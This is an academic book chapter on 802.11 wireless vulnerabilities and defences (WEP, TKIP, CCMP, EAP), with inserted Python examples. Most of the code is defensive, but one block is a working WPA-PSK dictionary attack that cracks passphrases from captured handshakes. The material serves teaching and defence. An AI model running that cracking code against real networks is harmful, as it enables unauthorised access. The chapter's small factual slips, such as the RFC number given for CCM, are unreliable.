Reiter, M., & Rubin, A. (1998). Crowds: Anonymity for Web transactions. ACM Transactions on Information and System Security, 1(1), 66-92.

Sampigethaya, K., & Poovendran, R. (2006). A survey on mix networks and their secure applications. Proceedings of the IEEE, 94(12).

Synnes, K., Nord, J., & Parnes, P. (2003, January). Location privacy in the Alipes platform. In Proceedings of the Hawaii International Conference on System Sciences (HICSS-36), Big Island, HI.

Tor: Overview. (n.d.). Retrieved January 1, 2007, from http://tor.eff.org/overview.html

Treu, G., & Küpper, A. (2005). Efficient proximity detection for location based services. In Proceedings of the 2nd Workshop on Positioning, Navigation and Communication 2005 (WPNC '05), Hannover, Germany: SHAKER-Publishing.

Wagealla, W., Terzis, S., & English, C. (2003). Trust-based model for privacy control in context-aware systems. In Proceedings of the 2nd Workshop on Security in Ubiquitous Computing, Ubicomp.



World Wide Web Consortium (W3C). (2002, April 15). W3C: A P3P preference exchange language 1.0 (APPEL1.0). Retrieved January 1, 2007, from http://www.w3.org/TR/P3P-preferences/

KEY TERMS

Anonymous E-Cash: Electronic payment system or protocol that provides anonymity to its users.

APPEL: A language specification to define rules for acceptance of certain P3P policies.

GeoPriv: An IETF working group, which assesses the authorization, integrity and privacy requirements of transfer, release or representation of geographic location information through an agent.

Mix Networks: Combination of proxy chains and asymmetric cryptography that enables hard-to-trace communication over unprotected networks.

P3P: The Platform for Privacy Preferences Project (P3P) enables Websites to express their privacy practices in a standard format that can be retrieved automatically and interpreted easily by user agents.

Privacy Enhancing Techniques: Technical means that provide anonymity and untraceability in networks.

Pseudonyms: Bogus identity, possibly temporary, used in order to hide the real identity.




Chapter X
Vulnerability Analysis and
Defenses in Wireless Networks
Lawan A. Mohammed
King Fahd University of Petroleum and Minerals, Saudi Arabia

Biju Issac
Swinburne University of Technology – Sarawak Campus, Malaysia

ABSTRACT

This chapter shows that the security challenges posed by 802.11 wireless networks are manifold, and it is therefore important to explore the various vulnerabilities that are present in such networks. Along with other security vulnerabilities, defense against denial of service attacks is a critical component of any security system. Unlike wired networks, where denial of service attacks have been extensively studied, there is a lack of research on preventing such attacks in wireless networks. In addition to various vulnerabilities, some factors leading to different types of denial of service (DoS) attacks and some defense mechanisms are discussed in this chapter. This can help to better understand wireless network vulnerabilities, so that more techniques and procedures to combat these attacks may subsequently be developed by researchers.

INTRODUCTION

Due to the increasing advancement in wireless technologies, wireless communication is becoming more prevalent as it is gaining more popularity in both public and private sectors. Wireless networks are based on a technology that uses radio waves or radio frequencies (RF) to transmit or send data along a communication path. Companies and individuals are using wireless technology for important communications that they want to keep private. A recent report by the market research firm Cahners In-Stat (In-Stat, 2006) predicts sales of 802.15.4 devices (using the low powered network standard) could grow by a compound annual growth rate (CAGR) of 200% from 2004 to 2009. In a similar survey, Infonetics projected that 57% of small, 62% of medium, and 72% of large organizations in North America will be using wireless LANs (WLANs) by 2009 (Richard, 2005).

Wired networks require a physical setup (i.e., cable wiring) for a user to get access, and a misbehaving network card can be tracked down and its switch port disconnected remotely using network management tools. But wireless users are not connected to any physical socket, and being in an unknown location, network access can be obtained almost spontaneously. Generally speaking,

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

typical wireless networks are defenseless against individuals who can find unsecured networks. The wireless server dutifully grants the unauthorized computer or mobile device an IP address, and the attacker is able to launch a variety of attacks such as breaking into specific servers, eavesdropping on network packets, unleashing a worm, and denial of service (DoS) or distributed denial of service (DDoS) attacks, and so forth. In this chapter, we discuss some security threats along with DoS attacks in typical wireless networks and survey some countermeasures.

OVERVIEW OF SECURITY CHALLENGES IN WIRELESS NETWORKS

Security has traditionally consisted of ensuring the confidentiality of data, the complete integrity of the data, and the availability of the data whenever needed—where service is not denied. Generally speaking, both wired and wireless network environments are complicated. Security solutions are most effective when they can be customized to a specific installation. Unfortunately, a high percentage of individuals involved in building and maintaining inter-networks and infrastructures for these environments have little knowledge of security protocols. As a result, many of today's systems are vulnerable. Recent reports indicated that wireless networks are becoming more popular. As these network deployments increase, so does the challenge to provide these networks with security. Wireless networks face more security challenges than their wired counterparts. This is partly due to the nature of the wireless medium, as transmitted signals can travel through the walls, ceilings, and windows of buildings up to thousands of feet outside of the building walls. Moreover, since the wireless medium is airwaves, it is a shared medium that allows anyone within a certain distance or proximity to intrude into the network and sniff the traffic. Further, the risk of using a shared medium is increasing with the advent of available hacking tools that can be found freely on hackers' Web sites. Additionally, some default wireless access points (APs) come from the manufacturers in open access mode with all security features turned off by default. Therefore, insecure wireless devices such as APs and user stations can seriously compromise wireless networks, making them popular targets for hackers.

Securing wireless networks requires at least three actions to be taken: first, authenticating users to ensure only legitimate users have access to the network; second, protecting the transmitted data by means of encryption; and third, preventing unauthorized connections by eliminating unauthorized transmitters or receivers. This emphasizes the need for a security framework with strong encryption and mutual authentication, as explained later.

Specific Challenges and Key Issues

The security challenges in wireless networks can be roughly divided into two main categories, based on their scope and impact. The first category involves attacks targeting the entire network and its infrastructure. This may include the following:

• Channel jamming: This involves jamming the wireless channel in the physical layer, thus denying network access to legitimate users. A typical example is the DoS attack.
• Unauthorized access: This involves gaining free access to the network and also using the AP to bypass the firewall and access the internal network. Once an attacker has access to the network, he/she can then launch additional attacks or just enjoy free network use. Although free network usage may not be a significant threat to many networks, network access is a key step in address resolution protocol (ARP)-based man-in-the-middle (MITM) attacks.
• Traffic analysis: This attack enables gaining information about data transmission and network activity by monitoring and intercepting the patterns of wireless communication. This involves analyzing the overhead wireless traffic to obtain useful information. There are three forms of information that an attacker can obtain. First, he/she can identify that there is


activity on the network. Secondly, he/she can find information about the location of APs in the surrounding area. This is because, unless turned off, APs broadcast their service set identifiers (SSIDs) for identification. Thirdly, he/she may learn the type of protocols being used in the transmission.

The second category involves attacks against the communication between the stations and the AP. This may include the following:

• Faking/replay attack: This involves the ability to guess the structure of transmitted information (even if it is encrypted) and replace the legitimate message with one which has the correct structure but that has altered fields. This is known as faking. A simple form of faking, and one that absolutely must be protected against, is that of replay. In this, an attacker simply records and then replays a message from one legitimate party to another. A new form of replay attack is known as the wormhole attack. In this attack, the attacker records packets or individual bits from a packet at one location in the network, tunnels them to another location, and replays them there, as described in Yih-Chun (2006).
• Eavesdropping: This implies the interception of information/data being transmitted over the wireless network. When the wireless link is not encrypted, an attacker can eavesdrop on the communication even from a few miles away. The attacker can gain two types of information from this attack; he/she can read the data transmitted in the session and can also gather information indirectly by examining the packets in the session, specifically their source, destination, size, number, and time of transmission. Eavesdropping can also be active; in this case the attacker not only listens to the wireless connection, but also actively injects messages into the communication medium.
• Man-in-the-middle attack (MITM): In this attack, the attacker resides between the station and the AP, and can intercept and modify the message, then release the modified message to the target destination. This can be done by setting up a rogue AP as described in Lynn and Baird (2002).
• Message forgery: In this attack, as the wireless link is not protected for message integrity, an attacker can inject forged messages into both directions of the communication.
• Session hijacking: In this attack, an attacker causes the user to lose his/her connection, and then assumes the user's identity and privileges for a period. It is an attack against the integrity of a session. The target knows that it no longer has access to the session but may not be aware that the session has been taken over by an attacker. The target may attribute the session loss to a normal malfunction of the WLAN.

Analysis of Wired Equivalent Privacy (WEP) Protocol

Wired equivalent privacy (WEP) has been part of the 802.11 standard since its initial ratification in September 1999. It is designed for data privacy and encryption to protect messages from unauthorized viewing in case they are intercepted in the air. Its goals are to provide integrity, availability, and confidentiality to the wireless networks. However, notable security research findings have shown deficiencies and flaws in the design of WEP (Fluhrer, Mantin, & Shamir, 2001; Gast, 2002, pp. 93-96).

War Driving and Its Variants

The process of identifying and categorizing wireless networks by using pre-configured laptops from within a moving vehicle is called war driving. War drivers use laptops and some special software to identify wireless networks and let them understand the security associated with any particular wireless network that they have recorded. They also upload their war driving results to a Web site where others who have access will be able to see exactly where these unsecured wireless networks are located. The use of GPS has aided this objective even further.



The war driving Web site http://www.worldwidewardrive.org has done the data collection during four rounds of war driving worldwide from 2002 to 2004. Their first worldwide war drive started on August 31 and finished on September 7, 2002. During this time, 9,374 APs were located and only 30.13% had WEP encryption enabled. The second drive lasted from October 26 to November 2, 2002, when they tracked 24,958 APs, with only 27.2% having WEP enabled. During the third drive, which happened from June 28 to July 5, 2003, 88,122 APs were located with only 32.26% WEP enabled. The fourth drive, started in June 2004 and lasting some months, located 228,537 APs, and the total number of wireless networks running WEP was found to be 38.3%.

Security Enhancements

In the context of the aforementioned deficiencies, the IEEE 802.11i or IEEE 802.11 Task Group i (TGi) developed a new set of WLAN security protocols to form the future IEEE 802.11i standard. The new security standard, 802.11i, which was confirmed and ratified in June 2004, eliminates all the weaknesses of WEP. It is divided into three main categories (Strand, 2004) and these enhancements are described as follows:

1. Temporary key integrity protocol (TKIP): This is essentially a short term solution that fixes all WEP weaknesses. It would be compatible with old 802.11 devices and it provides integrity and confidentiality.
2. Counter mode with cipher block chaining-message authentication code protocol (CCMP): This is a new protocol designed with planning, based on RFC 2610, which uses the Advanced Encryption Standard (AES) as cryptographic algorithm. Since this is more CPU intensive than RC4 (used in WEP and TKIP), new and improved 802.11 hardware may be required. It provides integrity and confidentiality.
3. Extensible authentication protocol (EAP): EAP is a general protocol for point-to-point (PPP) authentication that supports multiple authentication mechanisms.

Temporary Key Integrity Protocol (TKIP)

Wi-Fi protected access (WPA) was designed to replace WEP with the combination of TKIP, which provides data confidentiality through encryption, and a new cryptographic message integrity code called MIC or Michael, which provides data integrity. TKIP comprises the same encryption engine and RC4 algorithm defined for WEP. However, unlike WEP, TKIP uses a 128-bit key for encryption and a 64-bit key for authentication. This solves the problem of a shorter WEP key. TKIP also added a per-packet key mixing function to de-correlate the public initialization vectors (IVs) from weak keys. Furthermore, TKIP also provides a rekeying mechanism to provide fresh encryption and integrity keys by giving each user a unique shared key per session and by using the IV as a counter. It discards any IV value received out of sequence. If the IV space is exhausted, a new key is negotiated. This makes TKIP protected networks more resistant to cryptanalytic attacks involving key reuse. TKIP provides better security than WEP by adding four new algorithms:

• It provides a nonlinear hash function (Michael) that produces a 64-bit output. Unlike the CRC used in WEP, Michael is keyed. Only those who know the secret key can compute a valid hash.
• It provides a new IV sequencing discipline to remove replay attacks from the attacker's arsenal.
• It also has a per-packet key mixing function to de-correlate the public IVs from weak keys.
• Finally, it provides a rekeying mechanism, to provide fresh encryption and integrity keys, undoing the threat of attacks stemming from key reuse.

Table 1 shows how WPA uses TKIP and Michael to address the cryptographic weaknesses of WEP (Cable, 2004).

Counter CBC-MAC Mode

Counter with cipher block chaining-message authentication code, or simply CCM, is a mode



Table 1. WPA vs. WEP

WEP weakness                                | How weakness is addressed by WPA
--------------------------------------------|------------------------------------------------------------------------------
IV is too short                             | In TKIP, the IV has been doubled in size to 48 bits.
Weak data integrity                         | The WEP-encrypted CRC-32 checksum calculation has been replaced with Michael. The Michael algorithm calculates a 64-bit message integrity code (MIC) value, which is encrypted with TKIP.
Uses the master key rather than derived key | TKIP and Michael use a set of temporal keys that are derived from a master key and other values. The master key is derived from the extensible authentication protocol-transport layer security (EAP-TLS) or Protected EAP (PEAP) 802.1X authentication process. Additionally, the secret portion of the input to the RC4 PRNG is changed with each frame through a packet mixing function.
No rekeying                                 | WPA rekeys automatically to derive new sets of temporal keys.
No replay protection                        | TKIP uses the IV as a frame counter to provide replay protection.
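Two of the four TKIP additions listed above, the keyed Michael integrity check and the IV sequencing (replay) discipline, as an added example; this is not code from the chapter or from any 802.11 implementation. It assumes the Michael block function and padding of the published algorithm, a receiver that discards any frame whose 48-bit sequence counter (TSC) is not strictly greater than the last accepted one, and a constructed trace of frames; the MIC is computed over an already-assembled byte string, so the real MSDU prefix (destination/source address and priority) is not reproduced.

```python
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def _ror(x: int, n: int) -> int:
    return ((x >> n) | (x << (32 - n))) & MASK32


def _xswap(x: int) -> int:
    # swap the two octets inside each 16-bit half of the word
    return ((x & 0x00FF00FF) << 8) | ((x & 0xFF00FF00) >> 8)


def _michael_block(l: int, r: int):
    # the Michael block function b(L, R): rotations, swaps and additions mod 2^32
    r ^= _rol(l, 17)
    l = (l + r) & MASK32
    r ^= _xswap(l)
    l = (l + r) & MASK32
    r ^= _rol(l, 3)
    l = (l + r) & MASK32
    r ^= _ror(l, 2)
    l = (l + r) & MASK32
    return l, r


def michael_mic(key: bytes, msg: bytes) -> bytes:
    """Keyed 64-bit Michael MIC. The 64-bit key is read as two little-endian
    words (L, R); the message is padded with 0x5a and 4 to 7 zero octets up to
    a multiple of 4, then absorbed one little-endian 32-bit word at a time."""
    if len(key) != 8:
        raise ValueError("Michael uses a 64-bit key")
    l, r = struct.unpack("<II", key)
    padded = msg + b"\x5a" + b"\x00" * (4 + (-(len(msg) + 1) % 4))
    for off in range(0, len(padded), 4):
        l ^= struct.unpack_from("<I", padded, off)[0]
        l, r = _michael_block(l, r)
    return struct.pack("<II", l, r)


class TkipReceiver:
    """Receive-side state for one TKIP key: the last accepted 48-bit TSC and
    the Michael key used to verify each frame."""

    TSC_MAX = (1 << 48) - 1

    def __init__(self, mic_key: bytes):
        self.mic_key = mic_key
        self.last_tsc = -1          # nothing accepted yet

    def accept(self, tsc: int, body: bytes, mic: bytes):
        """Returns (accepted, reason). The sequence check runs first, as in
        TKIP, so a replayed frame is dropped before any MIC work is done."""
        if not 0 <= tsc <= self.TSC_MAX:
            return False, "TSC out of range"
        if tsc <= self.last_tsc:
            return False, "replay: TSC not greater than last accepted"
        if not hmac.compare_digest(michael_mic(self.mic_key, body), mic):
            return False, "MIC failure"   # TKIP also triggers countermeasures here
        self.last_tsc = tsc
        return True, "ok"


# Constructed trace of (TSC, body): frame 3 replays frame 2, frame 5 arrives
# after a higher TSC was already accepted, and the final frame is a forged body
# presented with the MIC of a different message.
MIC_KEY = bytes.fromhex("0011223344556677")          # constructed key
TRACE = [(1, b"frame one"), (2, b"frame two"), (2, b"frame two"),
         (5, b"frame five"), (4, b"frame four")]


def run_trace(mic_key: bytes = MIC_KEY):
    rx = TkipReceiver(mic_key)
    results = [rx.accept(tsc, body, michael_mic(mic_key, body))[0] for tsc, body in TRACE]
    results.append(rx.accept(6, b"frame six!", michael_mic(mic_key, b"frame six"))[0])
    return results


if __name__ == "__main__":
    print(michael_mic(bytes(8), b"").hex())   # published test vector: 82925c1ca1d130b8
    print(run_trace())                        # [True, True, False, True, False, False]
```

The zero-key, empty-message value is the Michael test vector from the 802.11 standard, so the block function can be checked against a known answer; the trace shows why the sequence check and the keyed MIC are separate defenses: the replayed and reordered frames carry valid MICs and are still rejected, while the forged body fails only on the MIC.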

of operation for a symmetric key block cipher algorithm. CCM may be used to provide assurance of the confidentiality and the authenticity of computer data by combining the techniques of the counter (CTR) mode and the cipher block chaining-message authentication code (CBC-MAC) algorithm. CCM is based on an approved symmetric key block cipher algorithm whose block size is 128 bits, such as the AES. CCM consists of two related processes: generation-encryption and decryption-verification, which combine two cryptographic primitives: counter mode encryption and cipher block chaining based authentication. Only the forward cipher function of the block cipher algorithm is used within these primitives. In generation-encryption, cipher block chaining is applied to the payload, the associated data, and a nonce to generate a message authentication code (MAC); then, counter mode encryption is applied to the MAC and the payload to transform them into a ciphertext. Thus, CCM generation-encryption expands the size of the payload by the size of the MAC. In decryption-verification, counter mode decryption is applied to the purported ciphertext to recover the MAC and the corresponding payload; then, cipher block chaining is applied to the payload, the received associated data, and the received nonce to verify the correctness of the MAC. Successful verification provides assurance that the payload and the associated data originated from a source with access to the key (Dworkin, 2004).

CCMP is the preferred encryption protocol in the 802.11i standard. CCMP is based upon the CCM mode of the AES encryption algorithm. Thus, CCMP utilizes 128-bit keys, with a 48-bit IV. As with CCM, confidentiality and authentication are provided by the counter mode (CM) and the cipher block chaining message authentication code (CBC-MAC).

CCMP addresses all known WEP deficiencies, but without the restrictions of the already-deployed hardware. The protocol has many properties in common with TKIP (Cam-Winget et al., 2003). WEP, TKIP, and CCMP can be compared as in Table 2.

802.1x/EAP Authentication

IEEE 802.1x was created for authentication in PPP. It ties in a protocol called EAP, which can be applied to both wired and wireless networks. It also supports multiple authentication methods, such as EAP-Message Digest (EAP-MD5), EAP-One Time Password (EAP-OTP), EAP-Transport Layer Security (EAP-TLS), EAP-Tunneled TLS (EAP-TTLS), EAP-Generic Token Card (EAP-GTC), Microsoft CHAP version 2 (EAP-MSCHAPv2), and EAP-FAST (Blunk & Vollbrecht, 1998).

In the 802.1x EAP authentication process, a client attempts to connect with an authenticator (AP). The AP responds by enabling a port for passing only EAP packets from the client to an authentication server located on the wired side of the AP. The AP blocks all other traffic, such as HTTP, DHCP, and POP3 packets, until the AP can verify the client's identity using an authentication server (e.g., RADIUS). Once authenticated, the AP opens the client's port for other types of traffic. The summary of the process is as shown in Figure 1.



Table 2. WEP, TKIP, and CCMP comparison (Cam-Winget, Housley, Wagner, & Walker, 2003)

                     | WEP                          | TKIP                                        | CCMP
---------------------|------------------------------|---------------------------------------------|--------------------
Cipher               | RC4                          | RC4                                         | AES
Key size             | 40 or 104 bits               | 128 bits encryption, 64 bits authentication | 128 bits
Key lifetime         | 24-bit IV, wrap              | 48-bit IV                                   | 48-bit IV
Packet key integrity | Concatenating IV to base key | Mixing function                             | Not needed
Packet data          | CRC-32                       | Michael                                     | CCM
Packet header        | None                         | Michael                                     | CCM
Replay detection     | None                         | Use IV sequencing                           | Use IV sequencing
Key management       | None                         | EAP-based (802.1x)                          | EAP-based (802.1x)
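The CCM generation-encryption and decryption-verification processes described in the Counter CBC-MAC Mode section above (the CCM column of Table 2), as an added example that is not code from the chapter or from any 802.11 implementation. It assumes the RFC 3610 block formatting (B_0, length-prefixed associated data, counter blocks A_i) with the CCMP-shaped parameters M = 8 (8-byte MIC) and L = 2 (13-byte nonce), and it replaces the AES forward cipher function with a keyed PRF built from HMAC-SHA256 truncated to 16 bytes so that it runs without a third-party library; the key, nonce, header and payload are constructed.

```python
import hashlib
import hmac

BLOCK = 16          # CCM requires a 128-bit block cipher


def forward_block(key: bytes, block: bytes) -> bytes:
    """Stand-in for the forward cipher function E_K of a 128-bit block cipher.
    Assumption: a keyed PRF (HMAC-SHA256 truncated to 16 bytes) replaces AES so
    the example runs offline. CCM only ever calls the forward direction, so no
    inverse is needed, exactly as the text notes."""
    if len(block) != BLOCK:
        raise ValueError("block must be 16 bytes")
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _auth_input(nonce: bytes, aad: bytes, payload: bytes, M: int, L: int) -> bytes:
    """B_0 || encoded associated data || payload, each zero-padded to 16 bytes
    (RFC 3610 formatting; associated data shorter than 2^16 - 2^8 bytes)."""
    if len(aad) >= 0xFF00:
        raise ValueError("example supports associated data below 65280 bytes")
    flags = (0x40 if aad else 0) | (((M - 2) // 2) << 3) | (L - 1)
    data = bytes([flags]) + nonce + len(payload).to_bytes(L, "big")
    if aad:
        enc = len(aad).to_bytes(2, "big") + aad
        data += enc + b"\x00" * (-len(enc) % BLOCK)
    return data + payload + b"\x00" * (-len(payload) % BLOCK)


def _cbc_mac(key: bytes, data: bytes, M: int) -> bytes:
    x = bytes(BLOCK)
    for off in range(0, len(data), BLOCK):
        x = forward_block(key, _xor(x, data[off:off + BLOCK]))
    return x[:M]                       # T: the M-byte authentication tag


def _ctr_keystream(key: bytes, nonce: bytes, nbytes: int, L: int):
    """Counter blocks A_i = flags || nonce || i. S_0 = E(A_0) encrypts the
    tag; S_1, S_2, ... encrypt the payload."""
    flags = bytes([L - 1])
    s0 = forward_block(key, flags + nonce + (0).to_bytes(L, "big"))
    stream, i = b"", 1
    while len(stream) < nbytes:
        stream += forward_block(key, flags + nonce + i.to_bytes(L, "big"))
        i += 1
    return s0, stream[:nbytes]


def ccm_encrypt(key, nonce, aad, payload, M=8, L=2) -> bytes:
    """Generation-encryption: CBC-MAC over (nonce, aad, payload), then CTR
    encryption of payload and tag. Output is len(payload) + M bytes."""
    if len(nonce) != 15 - L:
        raise ValueError("nonce must be 15 - L bytes")
    tag = _cbc_mac(key, _auth_input(nonce, aad, payload, M, L), M)
    s0, stream = _ctr_keystream(key, nonce, len(payload), L)
    return _xor(payload, stream) + _xor(tag, s0[:M])


def ccm_decrypt(key, nonce, aad, ciphertext, M=8, L=2):
    """Decryption-verification: CTR-decrypt payload and tag, recompute the
    CBC-MAC and compare in constant time. Returns the payload or None."""
    if len(nonce) != 15 - L or len(ciphertext) < M:
        return None
    c, u = ciphertext[:-M], ciphertext[-M:]
    s0, stream = _ctr_keystream(key, nonce, len(c), L)
    payload = _xor(c, stream)
    tag = _xor(u, s0[:M])
    expected = _cbc_mac(key, _auth_input(nonce, aad, payload, M, L), M)
    return payload if hmac.compare_digest(tag, expected) else None


# Constructed sample in the CCMP shape: 128-bit key, 8-byte MIC (M=8), L=2, and
# a 13-byte nonce built from a priority octet, a 6-byte transmitter address
# and a 48-bit packet number (the IV counter the text refers to).
KEY = bytes.fromhex("000102030405060708090a0b0c0d0e0f")
NONCE = bytes([0]) + bytes.fromhex("020000000001") + (42).to_bytes(6, "big")
AAD = b"frame header fields (constructed)"
PAYLOAD = b"802.11 data frame payload (constructed)"


def roundtrip():
    """Returns (ciphertext length, decrypted payload, result for a tampered frame)."""
    ct = ccm_encrypt(KEY, NONCE, AAD, PAYLOAD)
    tampered = bytes([ct[0] ^ 0x01]) + ct[1:]
    return len(ct), ccm_decrypt(KEY, NONCE, AAD, ct), ccm_decrypt(KEY, NONCE, AAD, tampered)
```

The expansion by exactly M bytes, the rejection of a flipped ciphertext bit, and the rejection of the same ciphertext presented with different associated data are the three properties the text attributes to CCM; because the decryption side returns None rather than the recovered payload on failure, a caller cannot accidentally act on unauthenticated data.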

• Client or supplicant sends an association request to the authenticator (AP)
• The authenticator or AP replies with an association response to the supplicant (client)
• Supplicant sends an EAP-start message to the authenticator
• The authenticator replies with an EAP-request identity message
• The supplicant sends an EAP-response packet containing the received identity to the authentication server
• The authentication server uses a specific authentication algorithm to verify the client's identity
• The authentication server will either send an acceptance or rejection message to the AP
• The AP sends an EAP-success packet (or reject packet) to the client

If the authentication server accepts the client, then the AP will transition the client's port to an authorized state and forward additional traffic. However, the potential for MITM attacks in tunneling EAP protocols such as PEAP and EAP-TTLS is documented in an IACR report that is available online (http://eprint.iacr.org/2002/163/).

Other Protocols

This section will briefly introduce other protocols that are being used or being developed in securing wireless networks.

• TIK protocol: TESLA with instant key disclosure protocol, or simply the TIK protocol, was proposed in Yih-Chun (2006). It is an extension of the TESLA broadcast authentication protocol (Perrig, Canetti, Tygar, & Song, 2000). It implements temporal leashes and provides efficient instant authentication for broadcast communication in wireless networks. The intuition behind TIK is that the packet transmission time can be significantly longer than the time synchronization error. In these cases, a receiver can verify the TESLA security condition (that the corresponding key has not yet been disclosed) as it receives the packet; this fact allows the sender to disclose the key in the same packet. TIK implements a temporal leash and, thus, enables the receiver to detect a wormhole attack. It is based on efficient symmetric cryptographic primitives (a message authentication code is a symmetric cryptographic primitive). It requires


Vulnerability Analysis

Figure 1. General EAP authentication process

client network Access Point Authentication server

Association Request

Association Response

EAP Start

EAP Request / ID

EAP Response / ID EAP Response / ID

EAP Success / Failure Success / Failure

EAP Key (optional )

accurate time synchronization between all communicating parties, and requires each communicating node to know just one public value for each sender node, thus enabling scalable key distribution.

• SSTP protocol: Microsoft is working on a remote access tunneling protocol that allows client devices to securely access networks via a virtual private network (VPN) from anywhere on the Internet without any issues with typical port blocking problems. The secure socket tunneling protocol (SSTP) makes a VPN tunnel that goes over HTTPS (TLS on TCP port 443), eliminating issues associated with VPN connections based on the point-to-point tunneling protocol (PPTP) or layer 2 tunneling protocol (L2TP) that can be blocked by some Web proxies, firewalls, and network address translation (NAT) routers that sit between clients and servers. The protocol is only for remote access and will not support site-to-site VPN tunnels (Fontana, 2007).

Other Attacks on Wireless Security

There are some other effective attacks that can be launched against 802.11 wireless networks and they are briefly explained next (Earle, 2006).

WPA Passive Dictionary Attack

This attack can be launched against a WPA pre-shared key (with four-way handshake) setup in 802.11 networks using a dictionary file of words (Takahashi, 2004). As a precaution, avoid dictionary words for the pass phrase during AP configuration and make the pass phrase more than 20 characters.

The process of the four-way handshake shown in Figure 2 can be explained as follows. The AP and communicating station need an individual pairwise transient key (PTK) to shield the unicast conversation between them. To come out with a different PTK for each AP-station pair, a pairwise master key (PMK) is included in the algorithm, along with the two MAC addresses, ANonce, and SNonce (two random values). The first two messages allow both sides to derive the same PTK without ever transmitting it in the air; only the nonces are sent. The AP also generates a group transient key (GTK) to shield all conversations, especially multicast and broadcast. As all stations on the wireless network need that same GTK to decrypt broadcast or multicast frames, the AP sends the current GTK in the third message of the handshake. To stop someone from hacking the communication, the GTK is encrypted with the PTK.

Figure 2. WPA-PSK four-way handshake

  Wireless station                                  802.11 wireless access point
  PMK is known and SNonce is generated              PMK is known and ANonce is generated
                     <-- Message 1: [ANonce] --------------------
  Create PTK from ANonce and SNonce
                     --- Message 2: [SNonce, MIC] -------------->
                                                    Create PTK from ANonce and SNonce, and supply GTK
                     <-- Message 3: [MIC, encrypted GTK] --------
  Install PTK and GTK
                     --- Message 4: [MIC] ---------------------->
                                                    Install PTK
  Encrypted communication follows
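The PMK and PTK derivation and the passive dictionary attack described above, as an added worked example that is not code from the chapter: it derives the PMK with PBKDF2-HMAC-SHA1 from passphrase and SSID, expands it to the PTK with the 802.11i PRF over the two MAC addresses and nonces, computes the EAPOL-Key MIC of message 2 with the key confirmation key, and then tests candidate passphrases against a "captured" message 2. The SSID, MAC addresses, nonces, passphrases, wordlist and the EAPOL-Key frame are constructed test data (assumed values, not from a real capture).

```python
"""WPA/WPA2-PSK key derivation and a passive four-way-handshake dictionary attack.

Added worked example; not code from the chapter. SSID, MAC addresses, nonces,
passphrases and the EAPOL-Key frame below are constructed test data.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Constructed handshake parameters (assumed values, not from any real capture).
SSID = "CorpNet"
AP_MAC = bytes.fromhex("001122aabbcc")      # authenticator address (AA)
STA_MAC = bytes.fromhex("00aabbccddee")     # supplicant address (SPA)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).

    Every input except the PMK is sent in clear in the handshake, which is what
    makes the offline dictionary attack possible.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.

    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1-128.
    The KCK is the first 16 bytes of the PTK.
    """
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN descriptor, version 2) with a zeroed MIC field."""
    key_info = 0x010A  # pairwise | MIC present | key descriptor version 2 (CCMP)
    body = struct.pack(">BHHQ", 2, key_info, 16, 1)  # descriptor, key info, key length, replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, key IV, key RSC, key ID
    body += b"\x00" * 16 + struct.pack(">H", 0)  # MIC placeholder, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL version 1, type 3 = EAPOL-Key


def make_capture(passphrase: str, ssid: str, aa: bytes, spa: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """Simulate what a sniffer sees: message 2 carrying the MIC the real supplicant computes."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    frame = build_msg2(snonce)
    return frame[:81] + eapol_mic(ptk[:16], frame, 2) + frame[97:]


def crack_psk(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
              captured_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC for each candidate and compare."""
    version = struct.unpack(">H", captured_msg2[5:7])[0] & 0x0007
    observed = captured_msg2[81:97]
    for candidate in wordlist:
        ptk = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], captured_msg2, version), observed):
            return candidate
    return None


def demo() -> Optional[str]:
    captured = make_capture("correct horse battery", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    wordlist = ["password", "letmein", "CorpNet2007", "correct horse battery", "12345678"]
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

A passive sniffer needs only messages 1 and 2 (ANonce, SNonce, both MAC addresses and the MIC of message 2). The cost per candidate is dominated by the 4096 PBKDF2 iterations, which is why the practical defenses are a long non-dictionary passphrase or, better, per-user credentials through 802.1x so that no shared PMK exists to guess.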

